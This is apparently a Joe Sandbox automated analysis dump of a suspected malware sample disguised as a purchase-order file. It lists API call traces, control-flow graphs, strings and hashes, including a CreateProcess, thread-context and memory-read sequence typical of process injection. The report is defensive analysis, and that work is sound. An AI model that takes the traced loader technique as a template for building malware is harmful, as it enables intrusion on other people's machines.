                        • PostQuitMessage.USER32(00000000), ref: 002B2AAE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                        • String ID: TaskbarCreated
                        • API String ID: 129472671-2362178303
                        • Opcode ID: 9adc56840d70c84e6bbf07f164de86c77aef8e8b529eb0a32c86b4710e7c764e
                        • Instruction ID: 4b54b11d093319c4ec2379ffed3bc3b0fa19fe89467ee84f4fe4f8dad2d4a132
                        • Opcode Fuzzy Hash: 9adc56840d70c84e6bbf07f164de86c77aef8e8b529eb0a32c86b4710e7c764e
                        • Instruction Fuzzy Hash: 8E413B32130346EBDB37AF68AC1ABFA365DF7143C0F544215FA16960A1DAB49CB88761

                        Control-flow Graph

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 002B30B0
                        • LoadCursorW.USER32(00000000,00007F00), ref: 002B30BF
                        • LoadIconW.USER32(00000063), ref: 002B30D5
                        • LoadIconW.USER32(000000A4), ref: 002B30E7
                        • LoadIconW.USER32(000000A2), ref: 002B30F9
                          • Part of subcall function 002B318A: LoadImageW.USER32(002B0000,00000063,00000001,00000010,00000010,00000000), ref: 002B31AE
                        • RegisterClassExW.USER32(?), ref: 002B3167
                          • Part of subcall function 002B2F58: GetSysColorBrush.USER32(0000000F), ref: 002B2F8B
                          • Part of subcall function 002B2F58: RegisterClassExW.USER32(00000030), ref: 002B2FB5
                          • Part of subcall function 002B2F58: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002B2FC6
                          • Part of subcall function 002B2F58: InitCommonControlsEx.COMCTL32(?), ref: 002B2FE3
                          • Part of subcall function 002B2F58: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002B2FF3
                          • Part of subcall function 002B2F58: LoadIconW.USER32(000000A9), ref: 002B3009
                          • Part of subcall function 002B2F58: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002B3018
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                        • String ID: #$0$AutoIt v3
                        • API String ID: 423443420-4155596026
                        • Opcode ID: c16d405097cab80a0394ca5739714f82bd4fe2de58bd515fd7b3c261091b808e
                        • Instruction ID: 1e93e76e52778cdbbd5a416e0dafa845857c3c9ffbe576c275e180951ec10e24
                        • Opcode Fuzzy Hash: c16d405097cab80a0394ca5739714f82bd4fe2de58bd515fd7b3c261091b808e
                        • Instruction Fuzzy Hash: 86216271D10304ABCB62DFADEC46A9ABFF9FB48314F10412AE20CA62A0D37445849F91

                        Control-flow Graph

                        control_flow_graph 1154 2dba66-2dba93 call 2d7750 call 2d8984 call 2d7616 1161 2dba95-2dbaab call 2df630 1154->1161 1162 2dbab0-2dbab5 1154->1162 1168 2dbd05-2dbd0a call 2d7795 1161->1168 1164 2dbabb-2dbac2 1162->1164 1166 2dbaf5-2dbb04 GetStartupInfoW 1164->1166 1167 2dbac4-2dbaf3 1164->1167 1169 2dbb0a-2dbb0f 1166->1169 1170 2dbc33-2dbc39 1166->1170 1167->1164 1169->1170 1174 2dbb15-2dbb2c 1169->1174 1171 2dbc3f-2dbc50 1170->1171 1172 2dbcf7-2dbd03 call 2dbd0b 1170->1172 1175 2dbc65-2dbc6b 1171->1175 1176 2dbc52-2dbc55 1171->1176 1172->1168 1179 2dbb2e-2dbb30 1174->1179 1180 2dbb33-2dbb36 1174->1180 1183 2dbc6d-2dbc70 1175->1183 1184 2dbc72-2dbc79 1175->1184 1176->1175 1182 2dbc57-2dbc60 1176->1182 1179->1180 1181 2dbb39-2dbb3f 1180->1181 1186 2dbb61-2dbb69 1181->1186 1187 2dbb41-2dbb52 call 2d7616 1181->1187 1188 2dbcf1-2dbcf2 1182->1188 1189 2dbc7c-2dbc88 GetStdHandle 1183->1189 1184->1189 1191 2dbb6c-2dbb6e 1186->1191 1198 2dbb58-2dbb5e 1187->1198 1199 2dbbe6-2dbbed 1187->1199 1188->1170 1192 2dbccf-2dbce5 1189->1192 1193 2dbc8a-2dbc8c 1189->1193 1191->1170 1196 2dbb74-2dbb79 1191->1196 1192->1188 1195 2dbce7-2dbcea 1192->1195 1193->1192 1197 2dbc8e-2dbc97 GetFileType 1193->1197 1195->1188 1200 2dbb7b-2dbb7e 1196->1200 1201 2dbbd3-2dbbe4 1196->1201 1197->1192 1202 2dbc99-2dbca3 1197->1202 1198->1186 1203 2dbbf3-2dbc01 1199->1203 1200->1201 1204 2dbb80-2dbb84 1200->1204 1201->1191 1205 2dbcad-2dbcb0 1202->1205 1206 2dbca5-2dbcab 1202->1206 1210 2dbc27-2dbc2e 1203->1210 1211 2dbc03-2dbc25 1203->1211 1204->1201 1212 2dbb86-2dbb88 1204->1212 1208 2dbcbb-2dbccd InitializeCriticalSectionAndSpinCount 1205->1208 1209 2dbcb2-2dbcb6 1205->1209 1207 2dbcb8 1206->1207 1207->1208 1208->1188 1209->1207 1210->1181 1211->1203 1213 2dbb98-2dbbcd InitializeCriticalSectionAndSpinCount 1212->1213 1214 2dbb8a-2dbb96 GetFileType 1212->1214 1215 2dbbd0 1213->1215 1214->1213 1214->1215 1215->1201
                        APIs
                        • __lock.LIBCMT ref: 002DBA74
                          • Part of subcall function 002D8984: __mtinitlocknum.LIBCMT ref: 002D8996
                          • Part of subcall function 002D8984: EnterCriticalSection.KERNEL32(002D0127,?,002D876D,0000000D), ref: 002D89AF
                        • __calloc_crt.LIBCMT ref: 002DBA85
                          • Part of subcall function 002D7616: __calloc_impl.LIBCMT ref: 002D7625
                          • Part of subcall function 002D7616: Sleep.KERNEL32(00000000,?,002D0127,?,002B125D,00000058,?,?), ref: 002D763C
                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 002DBAA0
                        • GetStartupInfoW.KERNEL32(?,00366990,00000064,002D6B14,003667D8,00000014), ref: 002DBAF9
                        • __calloc_crt.LIBCMT ref: 002DBB44
                        • GetFileType.KERNEL32(00000001), ref: 002DBB8B
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 002DBBC4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                        • String ID:
                        • API String ID: 1426640281-0
                        • Opcode ID: bb5ef79605014593704fcacc8c358f5b7928d07a8b179a91c24a353e77357515
                        • Instruction ID: f5fccc8bbc003379a72bfdcf6dcbf015f133a91d478cc1a73c40466fe93dffc3
                        • Opcode Fuzzy Hash: bb5ef79605014593704fcacc8c358f5b7928d07a8b179a91c24a353e77357515
                        • Instruction Fuzzy Hash: D681D470924745CFCB26CF68C8906A9BBB4BF09324F25425FD4A6AB3E1D7349C52CB54

                        Control-flow Graph

                        control_flow_graph 1216 3bc25e0-3bc268e call 3bc0000 1219 3bc2695-3bc26bb call 3bc34f0 CreateFileW 1216->1219 1222 3bc26bd 1219->1222 1223 3bc26c2-3bc26d2 1219->1223 1224 3bc280d-3bc2811 1222->1224 1231 3bc26d9-3bc26f3 VirtualAlloc 1223->1231 1232 3bc26d4 1223->1232 1225 3bc2853-3bc2856 1224->1225 1226 3bc2813-3bc2817 1224->1226 1228 3bc2859-3bc2860 1225->1228 1229 3bc2819-3bc281c 1226->1229 1230 3bc2823-3bc2827 1226->1230 1233 3bc28b5-3bc28ca 1228->1233 1234 3bc2862-3bc286d 1228->1234 1229->1230 1235 3bc2829-3bc2833 1230->1235 1236 3bc2837-3bc283b 1230->1236 1237 3bc26fa-3bc2711 ReadFile 1231->1237 1238 3bc26f5 1231->1238 1232->1224 1241 3bc28cc-3bc28d7 VirtualFree 1233->1241 1242 3bc28da-3bc28e2 1233->1242 1239 3bc286f 1234->1239 1240 3bc2871-3bc287d 1234->1240 1235->1236 1243 3bc283d-3bc2847 1236->1243 1244 3bc284b 1236->1244 1245 3bc2718-3bc2758 VirtualAlloc 1237->1245 1246 3bc2713 1237->1246 1238->1224 1239->1233 1249 3bc287f-3bc288f 1240->1249 1250 3bc2891-3bc289d 1240->1250 1241->1242 1243->1244 1244->1225 1247 3bc275f-3bc277a call 3bc3740 1245->1247 1248 3bc275a 1245->1248 1246->1224 1256 3bc2785-3bc278f 1247->1256 1248->1224 1252 3bc28b3 1249->1252 1253 3bc289f-3bc28a8 1250->1253 1254 3bc28aa-3bc28b0 1250->1254 1252->1228 1253->1252 1254->1252 1257 3bc2791-3bc27c0 call 3bc3740 1256->1257 1258 3bc27c2-3bc27d6 call 3bc3550 1256->1258 1257->1256 1264 3bc27d8 1258->1264 1265 3bc27da-3bc27de 1258->1265 1264->1224 1266 3bc27ea-3bc27ee 1265->1266 1267 3bc27e0-3bc27e4 CloseHandle 1265->1267 1268 3bc27fe-3bc2807 1266->1268 1269 3bc27f0-3bc27fb VirtualFree 1266->1269 1267->1266 1268->1219 1268->1224 1269->1268
                        APIs
                        • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03BC26B1
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03BC28D7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1701910428.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_3bc0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CreateFileFreeVirtual
                        • String ID:
                        • API String ID: 204039940-0
                        • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                        • Instruction ID: 400303d94e19acfab0701eed64668776a8427b7727404c7575b2d2dadd15c6fe
                        • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                        • Instruction Fuzzy Hash: F0A10674E10249EBDF24CFA4C894BAEB7B5FF48308F2485ADE505AB280D7759A41CF94

                        Control-flow Graph

                        control_flow_graph 1325 2ceb05-2ceb2f call 2bc4cd RegOpenKeyExW 1328 324b17-324b2e RegQueryValueExW 1325->1328 1329 2ceb35-2ceb39 1325->1329 1330 324b30-324b6d call 2d010a call 2b4bce RegQueryValueExW 1328->1330 1331 324b91-324b9a RegCloseKey 1328->1331 1336 324b88-324b90 call 2b4fd2 1330->1336 1337 324b6f-324b86 call 2b7e53 1330->1337 1336->1331 1337->1336
                        APIs
                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,002CEADA,?,?), ref: 002CEB27
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,002CEADA,?,?), ref: 00324B26
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,002CEADA,?,?), ref: 00324B65
                        • RegCloseKey.ADVAPI32(?,?,002CEADA,?,?), ref: 00324B94
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: QueryValue$CloseOpen
                        • String ID: Include$Software\AutoIt v3\AutoIt
                        • API String ID: 1586453840-614718249
                        • Opcode ID: 0533e732e4308c889842966ebb60ce41a7a71941d4bb3cce0706824103b466dd
                        • Instruction ID: 95a721d06b9af3af11808e8bfb5942a0ad580e9048f1146b1124d66fd08cf404
                        • Opcode Fuzzy Hash: 0533e732e4308c889842966ebb60ce41a7a71941d4bb3cce0706824103b466dd
                        • Instruction Fuzzy Hash: 3D114C71A10118BEEB05ABA4DDC6EFE77BCEF04758F100059F506E61A1EAB0AE15DB60

                        Control-flow Graph

                        control_flow_graph 1352 2b2e9d-2b2f0d CreateWindowExW * 2 ShowWindow * 2
                        APIs
                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002B2ECB
                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002B2EEC
                        • ShowWindow.USER32(00000000), ref: 002B2F00
                        • ShowWindow.USER32(00000000), ref: 002B2F09
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$CreateShow
                        • String ID: AutoIt v3$edit
                        • API String ID: 1584632944-3779509399
                        • Opcode ID: 9455c7ccce81f0bb5041c7694e28bab0c61b244cdd7931b05870030317292d3d
                        • Instruction ID: 35aa321f271695b0ca97f1b01ca3ec8d4adc1b4ee93337da54c500b89c9595d9
                        • Opcode Fuzzy Hash: 9455c7ccce81f0bb5041c7694e28bab0c61b244cdd7931b05870030317292d3d
                        • Instruction Fuzzy Hash: A3F0DA72A402D07AE7326B6BAC4AE672E7DD7C6F20F01411EBA08A61A0C56518D5DAB1
                        APIs
                          • Part of subcall function 002B3F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002B34E2,?,00000001), ref: 002B3FCD
                        • _free.LIBCMT ref: 00323C27
                        • _free.LIBCMT ref: 00323C6E
                          • Part of subcall function 002BBDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,003722E8,?,00000000,?,002B3E2E,?,00000000,?,0034DBF0,00000000,?), ref: 002BBE8B
                          • Part of subcall function 002BBDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,002B3E2E,?,00000000,?,0034DBF0,00000000,?,00000002), ref: 002BBEA7
                          • Part of subcall function 002BBDF0: __wsplitpath.LIBCMT ref: 002BBF19
                          • Part of subcall function 002BBDF0: _wcscpy.LIBCMT ref: 002BBF31
                          • Part of subcall function 002BBDF0: _wcscat.LIBCMT ref: 002BBF46
                          • Part of subcall function 002BBDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 002BBF56
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<+
                        • API String ID: 1510338132-968007387
                        • Opcode ID: 31656495ec191938db4def49da2c091d34ad9d31958a639507857d9fe8edc8b4
                        • Instruction ID: 8b355995bab2bc13ad0aac9a248555ccbbeb99751187af34f386767fe09fa013
                        • Opcode Fuzzy Hash: 31656495ec191938db4def49da2c091d34ad9d31958a639507857d9fe8edc8b4
                        • Instruction Fuzzy Hash: A1917071920229AFCF05EFA4DC919EEB7B4BF09350F10442AF516AB291DB74AE15CF50
                        APIs
                          • Part of subcall function 03BC22A0: Sleep.KERNEL32(000001F4), ref: 03BC22B1
                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03BC24D3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1701910428.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_3bc0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CreateFileSleep
                        • String ID: SF4JN33SUYW8
                        • API String ID: 2694422964-1055785038
                        • Opcode ID: 69e903d443ff7caa2e3ffb730fafdf8fe467f335fa286f863115a5aefbe24f07
                        • Instruction ID: ddb5bf3823ef574bd9d5cc5c1bfa13df2d36341db239c89f49ec3f5402197d3a
                        • Opcode Fuzzy Hash: 69e903d443ff7caa2e3ffb730fafdf8fe467f335fa286f863115a5aefbe24f07
                        • Instruction Fuzzy Hash: 49518334D14349DBEF24DBA4C855BEEB779AF48304F0045A9E208BB2C0D6B91B45CBA5
                        APIs
                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0032454E
                          • Part of subcall function 002B7E53: _memmove.LIBCMT ref: 002B7EB9
                        • _memset.LIBCMT ref: 002B3965
                        • _wcscpy.LIBCMT ref: 002B39B5
                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 002B39C6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                         • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                        • String ID: Line:
                        • API String ID: 3942752672-1585850449
                        • Opcode ID: 68f4be6f0b2a5afef33f9f10bcd92725a7810db0811486e7ede6cfb7427dbd99
                        • Instruction ID: 939c9f86fbdcdf2e3618d559be09b626f6231df93d048928b6d2f07fdca07f9f
                        • Opcode Fuzzy Hash: 68f4be6f0b2a5afef33f9f10bcd92725a7810db0811486e7ede6cfb7427dbd99
                        • Instruction Fuzzy Hash: 9231C9720287406BD732EF54DC41BDB77ECAF45390F00451EF189921A1DBB0AAA8CF92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                         • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID: dE6
                        • API String ID: 0-4062942263
                        • Opcode ID: ebecb11fea8b71ff443d61e7dbe907f575fcacb09a6773d05f7fe408fd011b20
                        • Instruction ID: 1857f0aae5b8ba1a17dce087fe8d590691fa5a418c2cbb9797aa64b0e23ff83b
                        • Opcode Fuzzy Hash: ebecb11fea8b71ff443d61e7dbe907f575fcacb09a6773d05f7fe408fd011b20
                        • Instruction Fuzzy Hash: 8CF19C716087019FC725DF28C891B5AB7E5FF88314F10892EF9998B292DB30E945CF82
                        APIs
                        • SHGetMalloc.SHELL32(1<+), ref: 002B3A7D
                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 002B3AD2
                        • SHGetDesktopFolder.SHELL32(?), ref: 002B3A8F
                          • Part of subcall function 002B3B1E: _wcsncpy.LIBCMT ref: 002B3B32
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                         • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: DesktopFolderFromListMallocPath_wcsncpy
                        • String ID: 1<+
                        • API String ID: 3981382179-94885386
                        • Opcode ID: 039e4fc7fcfd8796965996cba69b92f08f8da231982379062ee2e19d7b47e452
                        • Instruction ID: b8dcaa1a5dbc09db9caabb22ded4f1afd3fa9a133b986a147227012a8b71ae6c
                        • Opcode Fuzzy Hash: 039e4fc7fcfd8796965996cba69b92f08f8da231982379062ee2e19d7b47e452
                        • Instruction Fuzzy Hash: 5F213D76B00114ABCB15DF95D884DEEB7BDEF88744F104098F50ADB255DB709E46CB90
                        APIs
                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,002CC948,SwapMouseButtons,00000004,?), ref: 002CC979
                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,002CC948,SwapMouseButtons,00000004,?,?,?,?,002CBF22), ref: 002CC99A
                        • RegCloseKey.KERNEL32(00000000,?,?,002CC948,SwapMouseButtons,00000004,?,?,?,?,002CBF22), ref: 002CC9BC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                         • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID: Control Panel\Mouse
                        • API String ID: 3677997916-824357125
                        • Opcode ID: a7e0260b763777ddab353ae0b9db74198250197fc257d125995db49a53cfbded
                        • Instruction ID: dd0683962f1ecc14b41f9291a8a932252bc005ea4b7853191fc676c20b144694
                        • Opcode Fuzzy Hash: a7e0260b763777ddab353ae0b9db74198250197fc257d125995db49a53cfbded
                        • Instruction Fuzzy Hash: 4F117C75521208FFDB218F64DC84EBE7BBCEF04740F20451AE849E7210D231AE609B60
                        APIs
                        • CreateProcessW.KERNEL32(?,00000000), ref: 03BC1A5B
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03BC1AF1
                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 03BC1B13
                        Memory Dump Source
                        • Source File: 00000000.00000002.1701910428.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_3bc0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                        • Instruction ID: e91e9945db9f8c1336999336ca56bfcd1bde2cf27c793c80e38a3c9a20bb356d
                        • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                        • Instruction Fuzzy Hash: F9621B30A24258DBEB24CFA4C850BDEB376EF58304F1091A9D10DEB395E7759E81CB59
                        APIs
                          • Part of subcall function 002B41A7: _fseek.LIBCMT ref: 002B41BF
                          • Part of subcall function 002FCE59: _wcscmp.LIBCMT ref: 002FCF49
                          • Part of subcall function 002FCE59: _wcscmp.LIBCMT ref: 002FCF5C
                        • _free.LIBCMT ref: 002FCDC9
                        • _free.LIBCMT ref: 002FCDD0
                        • _free.LIBCMT ref: 002FCE3B
                          • Part of subcall function 002D28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,002D8715,00000000,002D88A3,002D4673,?), ref: 002D28DE
                          • Part of subcall function 002D28CA: GetLastError.KERNEL32(00000000,?,002D8715,00000000,002D88A3,002D4673,?), ref: 002D28F0
                        • _free.LIBCMT ref: 002FCE43
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                         • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                        • String ID:
                        • API String ID: 1552873950-0
